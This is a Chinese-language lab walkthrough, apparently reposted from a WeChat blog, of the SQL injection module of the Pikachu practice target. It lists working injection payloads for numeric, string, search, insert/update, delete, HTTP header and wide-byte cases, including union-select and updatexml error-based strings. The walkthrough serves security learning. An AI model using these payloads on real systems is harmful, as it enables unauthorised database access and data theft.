pikachu靶机-sql注入

admin 2025年1月20日23:50:53评论4 views字数 1503阅读5分0秒阅读模式

本篇文章旨在为网络安全渗透测试靶机复现学习(内容学习中,仅供参考)。通过阅读本文,读者将能够对渗透pikachu靶场SQL注入模块有一定的了解

原文学习链接

CSDN博主:One_Blanks
主页地址:https://blog.csdn.net/NPSM_?type=blog

一、数字型注入(post)

1、 burp 抓包

pikachu靶机-sql注入
pikachu靶机-sql注入

2、 order by探测列表数

order by 2 #查询数据库列,数字 2 是字段的索引、从1开始计数
pikachu靶机-sql注入

3、 union查询数据库、数据库用户

id=2 union select user(),database()–+
# union联合查询
# select user(), database() 返回当前数据库用户,返回当前数据库名称
# –+ 注释符 不知道后面有什么会写什么所以就注释掉
pikachu靶机-sql注入

二、字符型注入(get)

1、输入框引起报错

pikachu靶机-sql注入
pikachu靶机-sql注入

2、order by探测列表数

' order by 3#   
'
 order by 2#   
# 查询列数
pikachu靶机-sql注入
pikachu靶机-sql注入
pikachu靶机-sql注入

3、 union查询数据库、数据库用户

' union select user(),database()#
# union联合查询
# select user(), database() 返回当前数据库用户,返回当前数据库名称
# –+ 注释符 不知道后面有什么会写什么所以就注释掉
pikachu靶机-sql注入

三、搜索型注入

1、 输入框引起报错

pikachu靶机-sql注入
pikachu靶机-sql注入

2、 order by探测列表数

' order by 3#
'
 order by 4#
pikachu靶机-sql注入
pikachu靶机-sql注入
pikachu靶机-sql注入

3、 union查询用户信息

' union select user(),database(),3#
# union联合查询
# select user(), database() 返回当前数据库用户,返回当前数据库名称
# # 注释符 不知道后面有什么会写什么所以就注释掉
pikachu靶机-sql注入

四、 xx型注入

1、 输入框引起报错

pikachu靶机-sql注入
pikachu靶机-sql注入

2、 order by探测列表数

') order by 2#
'
) order by 3#
pikachu靶机-sql注入
pikachu靶机-sql注入

3、 union查询用户信息

') union select user(),database()#
pikachu靶机-sql注入

五、"insert/update"注入

1、 打开注册信息

pikachu靶机-sql注入

2、 输入框引起报错

pikachu靶机-sql注入
pikachu靶机-sql注入

3、 构建updateXML语句

x' or updatexml(1,concat(0x7e,database()),0) or '#
# x' or 闭合任何前置的单引号
# updatexml(1, 用于更新 XML 数据
# concat(0x7e,   将 ~(十六进制 0x7e)与当前数据库名称连接起来。
#  database())  返回当前使用的数据库名称
pikachu靶机-sql注入

六、 delete注入

1、 burp suite 抓删除数据的包

pikachu靶机-sql注入
pikachu靶机-sql注入

2、 burp suite 修改数据包

pikachu靶机-sql注入
pikachu靶机-sql注入

3、 构建注入语句,并发送数据包

id=1+or+updatexml(1,concat(0x7e,database()),0)
pikachu靶机-sql注入
pikachu靶机-sql注入

七、 http头注入

1、 burp suite 抓包

pikachu靶机-sql注入
pikachu靶机-sql注入

2、 burp suite 改包 单引号测试报错

pikachu靶机-sql注入
pikachu靶机-sql注入

3、 构建注入语句,并发送数据包

' or+updatexml(1,concat(0x7e,database()),0) or '
# 'or 开始逻辑or条件 
# updatexml 用于更新 XML 数据
# concat(0x7e,database()) 将~转换16进制与当前数据库名称连接起来
# or' 结束逻辑or条件
pikachu靶机-sql注入

八.九、盲注

有个关于盲注的便捷方法,就是使用bp设置两个参数变量,设置好字典让bp自己去跑.
pikachu靶机-sql注入

十、宽字节注入

1、 输入框引起报错

pikachu靶机-sql注入

2、 burp 抓包

pikachu靶机-sql注入

3、 burp加入url编码,并发包

kobe%df'+or+1=1#
# %df: 这是 URL 编码的 %df,解码后是 ß
# +or+1=1 逻辑运算符 1=1为真
# 注释符
# 原理: ’+%df=運’ %df会消除反斜杠 变成一个可以实现闭合的字符
pikachu靶机-sql注入

原文始发于微信公众号(泷羽SEC-ohh):pikachu靶机-sql注入

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月20日23:50:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   pikachu靶机-sql注入https://cn-sec.com/archives/3652674.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息